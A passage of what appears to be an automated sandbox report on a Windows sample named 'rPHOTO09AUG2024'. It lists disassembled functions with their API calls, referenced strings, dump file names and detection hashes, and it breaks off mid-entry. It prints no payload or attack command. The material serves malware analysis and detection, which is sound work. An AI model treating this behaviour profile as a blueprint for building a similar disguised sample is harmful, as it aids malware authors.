Opcode Fuzzy Hash: c72691de33c10520a004734f766a70e9bd121afa49952d2da2ca19d547fcd962
Instruction Fuzzy Hash: 45518131604701DFDB109F25EC49BAABBE5EF48710F188929F59ADB2A5DB70E800CB75

Function 00DAB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DAB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DAB7B1
GetLastError.KERNEL32 ref: 00DAB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00DAB828

Strings

UNKNOWN, xrefs: 00DAB7E0
NOTREADY, xrefs: 00DAB7E7
INVALID, xrefs: 00DAB7FA
READONLY, xrefs: 00DAB7F3
READY, xrefs: 00DAB801

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: c8bb74c422f7e847de52a7da9407af1554e857790261ec8fc94772740110667c
Instruction ID: fa7fd09eba8312f12f160e27bf3a33b6dacb9293dce005707253dbbaac3c5edf
Opcode Fuzzy Hash: c8bb74c422f7e847de52a7da9407af1554e857790261ec8fc94772740110667c
Instruction Fuzzy Hash: 12317435A00309AFDB10EF68C885EBEBBB4EF46750F14802AE505D7292DBB19946C771

Function 00D99471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D994F6
GetDlgCtrlID.USER32 ref: 00D99501
GetParent.USER32 ref: 00D9951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D99520
GetDlgCtrlID.USER32(?), ref: 00D99529
GetParent.USER32(?), ref: 00D99545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D99548

Strings

ListBox, xrefs: 00D994B3
ComboBox, xrefs: 00D9947E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 10d2d37377b33e69cb78edb29eda084429b09d984a02cfdcb1cd7671368f0190
Instruction ID: 537b16015a8d31b9a246c00277ddee9843e03bce36c3a5ba481e29e529e0c553
Opcode Fuzzy Hash: 10d2d37377b33e69cb78edb29eda084429b09d984a02cfdcb1cd7671368f0190
Instruction Fuzzy Hash: EF21F470A00209BBCF05ABA4CC95EFEBB75EF49310F104219B561972E2DB759919DB30

Function 00D9955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D9B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D995DF
GetDlgCtrlID.USER32 ref: 00D995EA
GetParent.USER32 ref: 00D99606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D99609
GetDlgCtrlID.USER32(?), ref: 00D99612
GetParent.USER32(?), ref: 00D9962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D99631

Strings

ListBox, xrefs: 00D9959E
ComboBox, xrefs: 00D99569

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 4905e9471dd3c7ec158a1bf75aa7ba41128c805f2a089f91d09ecb6ceacc2cb4
Instruction ID: bcea9cf270f68280868759457d9707e87eb57a8d1399f0e6dcfae4eb1d4039d7
Opcode Fuzzy Hash: 4905e9471dd3c7ec158a1bf75aa7ba41128c805f2a089f91d09ecb6ceacc2cb4
Instruction Fuzzy Hash: 9921F270A40209BBDF00AB64CC96EFEBB79EF58300F14411AF961972A2DB759919DB30

Function 00D99645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00D99651
GetClassNameW.USER32(00000000,?,00000100), ref: 00D99666
_wcscmp.LIBCMT ref: 00D99678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D996F3

Strings

smallicons, xrefs: 00D996BB
largeicons, xrefs: 00D99687
list, xrefs: 00D996D5
SHELLDLL_DefView, xrefs: 00D99672
details, xrefs: 00D996A1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c0fc0183b2962100df4f5c50da6e549f54728404aeeb0fff049f885396b847cf
Instruction ID: ac5fdcadcd795db134bd17c8221274b4deca101e028dcddbba5c35b1e8ccc692
Opcode Fuzzy Hash: c0fc0183b2962100df4f5c50da6e549f54728404aeeb0fff049f885396b847cf
Instruction Fuzzy Hash: 3E11C676648307BBFF052628DC26EA6F79CDF05760B20412AFA00E51D1FEA1A9558A78

Function 00DB8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DB8BEC
CoInitialize.OLE32(00000000), ref: 00DB8C19
CoUninitialize.OLE32 ref: 00DB8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00DB8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00DB8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00DD2C0C), ref: 00DB8E84
CoGetObject.OLE32(?,00000000,00DD2C0C,?), ref: 00DB8EA7
SetErrorMode.KERNEL32(00000000), ref: 00DB8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DB8F3A
VariantClear.OLEAUT32(?), ref: 00DB8F4A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 54fd7f7cbe52a5c6fcfcd8df86283775fda51e489f93dd7fce601b1d35ec1007
Instruction ID: a46e42930c2ede04d1468c93930da0fc90fc18443979613c66290edc8c670a79
Opcode Fuzzy Hash: 54fd7f7cbe52a5c6fcfcd8df86283775fda51e489f93dd7fce601b1d35ec1007
Instruction Fuzzy Hash: 72C1F2B1608306EFC700EF64C8849AAB7E9FF89748F04495DF58A9B251DB71ED05CB62

Function 00DA4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00DA419D
__swprintf.LIBCMT ref: 00DA41AA

Part of subcall function 00D638D8: __woutput_l.LIBCMT ref: 00D63931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00DA41D4
LoadResource.KERNEL32(?,00000000), ref: 00DA41E0
LockResource.KERNEL32(00000000), ref: 00DA41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00DA420D
LoadResource.KERNEL32(?,00000000), ref: 00DA421F
SizeofResource.KERNEL32(?,00000000), ref: 00DA422E
LockResource.KERNEL32(?), ref: 00DA423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00DA429B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: ef7564f4b3c76d4d4e52094340a83f2e3a442066c68113c7801edb46c3397ec4
Instruction ID: f30242aa8a8fbced32dd3e5807c77535a32ef87b7b907cbbab80004cfe8f7357
Opcode Fuzzy Hash: ef7564f4b3c76d4d4e52094340a83f2e3a442066c68113c7801edb46c3397ec4
Instruction Fuzzy Hash: 91319C71A0120BAFDB119FA1DC44EFFBBADEF45301F044525F905D6250D7B0DA518AB8

Function 00D4FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D4FC06
OleUninitialize.OLE32(?,00000000), ref: 00D4FCA5
UnregisterHotKey.USER32(?), ref: 00D4FDFC
DestroyWindow.USER32(?), ref: 00D84A00
FreeLibrary.KERNEL32(?), ref: 00D84A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D84A92

Strings

close all, xrefs: 00D4FC01

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 59eee0a43f295beed8590c23dd42082ce646fbdaf31533906a2adf6832c25bed
Instruction ID: 60c55845377e5e295c7d5fa4a21afc4cb9044f14f4fafba3a41a740e48beb489
Opcode Fuzzy Hash: 59eee0a43f295beed8590c23dd42082ce646fbdaf31533906a2adf6832c25bed
Instruction Fuzzy Hash: 40A148317012138FCB29EF14C595A6AF7A5EF14704F1842ADE84AAB262DB30ED16CF74

Function 00D9A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00D9AA64), ref: 00D9A9A2

Strings

CLASS, xrefs: 00D9A721
CLASSNN, xrefs: 00D9A744
NAME, xrefs: 00D9A7D4
TEXT, xrefs: 00D9A8D9
REGEXPCLASS, xrefs: 00D9A767
INSTANCE, xrefs: 00D9A8B0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5db5c61e255730d9387ac694f6e02afaed67785f29893bc9e21e4a306404a26d
Instruction ID: fa898a1132548b015c3847c867028c47e00858b4e7963254f35c2f0a7c15dc39
Opcode Fuzzy Hash: 5db5c61e255730d9387ac694f6e02afaed67785f29893bc9e21e4a306404a26d
Instruction Fuzzy Hash: 4E917032A00606ABDF08DF68C481BE9FB75FF04304F548119E99AA7651DB30AA59CFF1

Function 00D42E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00D42EAE

Part of subcall function 00D41DB3: GetClientRect.USER32(?,?), ref: 00D41DDC
Part of subcall function 00D41DB3: GetWindowRect.USER32(?,?), ref: 00D41E1D
Part of subcall function 00D41DB3: ScreenToClient.USER32(?,?), ref: 00D41E45

GetDC.USER32 ref: 00D7CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D7CF95
SelectObject.GDI32(00000000,00000000), ref: 00D7CFA3
SelectObject.GDI32(00000000,00000000), ref: 00D7CFB8
ReleaseDC.USER32(?,00000000), ref: 00D7CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D7D04B

Strings

U, xrefs: 00D7CF20

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 74467b1dec1e1210a561977a341f98b78b831376414015d2daf6010c1c9d210e
Instruction ID: c923dbe53858c7acc5e1a4e76d6e96a4f82adfe16b489c42106cad5b3e38c0b5
Opcode Fuzzy Hash: 74467b1dec1e1210a561977a341f98b78b831376414015d2daf6010c1c9d210e
Instruction Fuzzy Hash: 9371A330500205DFCF258F64CC85ABA7BB6FF49350F18926AFD999A2A6E731C851DB70

Function 00DB8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00DCF910), ref: 00DB903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00DCF910), ref: 00DB9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DB91EB
SysFreeString.OLEAUT32(?), ref: 00DB9215

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: bf60f2bb145e87f09c5d27773faf6d4e97fe84a76f6b0ad9de459c8853f7a5b0
Instruction ID: 61bee2f77c45c9eedd6395cf0496da716ffd422f9750ecf2689227dd484efb6f
Opcode Fuzzy Hash: bf60f2bb145e87f09c5d27773faf6d4e97fe84a76f6b0ad9de459c8853f7a5b0
Instruction Fuzzy Hash: C6F10771A00209EFDB04DF94C898EEEB7B9FF49315F148059F616AB251DB31AE45CB60

Function 00DBF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DBF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DBFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DBFD90
CloseHandle.KERNEL32(?), ref: 00DBFDBF
CloseHandle.KERNEL32(?), ref: 00DBFE36

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 0416a3ac7a9e96fb8b461946d7674539a73148b917a965cb032742f811acd7ba
Instruction ID: 9013f1b846c55b4efa6bbc0aff4ce0951cdbfb26c7de1ccff2f92731f306495c
Opcode Fuzzy Hash: 0416a3ac7a9e96fb8b461946d7674539a73148b917a965cb032742f811acd7ba
Instruction Fuzzy Hash: C9E18531204341DFCB14EF24C891AAABBE1EF85354F18856DF89A9B2A2DB31DD45CB71

Function 00DA4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA38D3,?), ref: 00DA48C7

Part of subcall function 00DA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA38D3,?), ref: 00DA48E0

Part of subcall function 00DA4CD3: GetFileAttributesW.KERNEL32(?,00DA3947), ref: 00DA4CD4

lstrcmpiW.KERNEL32(?,?), ref: 00DA4FE2
_wcscmp.LIBCMT ref: 00DA4FFC
MoveFileW.KERNEL32(?,?), ref: 00DA5017

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: ea65f5d09f5640bf000eb7e61799d639c41dbe41b90e3deab2ee73d4ad3b0d29
Instruction ID: 385d8d6a23ef45402f45b2cb89d53589809564b0fc6cf293ff0b00dc72f13c6a
Opcode Fuzzy Hash: ea65f5d09f5640bf000eb7e61799d639c41dbe41b90e3deab2ee73d4ad3b0d29
Instruction Fuzzy Hash: CC5161B25087859BC724EB60D8819DFB3ECEF85311F04492EB289D3152EF74E2888776

Function 00DC88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DC896E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 50d02fc1f5c91f447f15dae55257be3a16e207fdc24a3eacacd6290a43ea1f59
Instruction ID: f1d2f1d86061dafc690da5cd4d6c7aecbcd7f8a5509707d01ac4296a0ea59904
Opcode Fuzzy Hash: 50d02fc1f5c91f447f15dae55257be3a16e207fdc24a3eacacd6290a43ea1f59
Instruction Fuzzy Hash: 6851AF3060020BBFDB209B28DC85FAA3B65EF05310F64421AF555E76A0CF71E990AB71

Function 00D42B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D7C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D7C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D7C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D7C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D7C5C0
DestroyIcon.USER32(00000000), ref: 00D7C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D7C5EC
DestroyIcon.USER32(?), ref: 00D7C5FB

Part of subcall function 00DCA71E: DeleteObject.GDI32(00000000), ref: 00DCA757

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: b2fe088833476abc77b23ad1f652c78509f8d9b5d486b8ad1a81f51f4b40184d
Instruction ID: deb8c09b57577a94d63db71a49a22cb83c48412dd21c2317635873f0be452615
Opcode Fuzzy Hash: b2fe088833476abc77b23ad1f652c78509f8d9b5d486b8ad1a81f51f4b40184d
Instruction Fuzzy Hash: 7051477065020AAFDB24DF25CC85FBA3BB5EB58310F544528F946E72A0EB71E990DB70

Function 00D99B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9AE77
Part of subcall function 00D9AE57: GetCurrentThreadId.KERNEL32 ref: 00D9AE7E
Part of subcall function 00D9AE57: AttachThreadInput.USER32(00000000,?,00D99B65,?,00000001), ref: 00D9AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00D99B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00D99B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00D99B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D99B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00D99BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D99BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00D99BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00D99BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00D99BDD

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 06fc885601c69690babc291e7ecf9c75cbadd7fc38b4b7eef12cd1345b1531ea
Instruction ID: 4dce1b44b351206e746c93c3eefd4e55d12635f2e4d45918a510939c0e177a7a
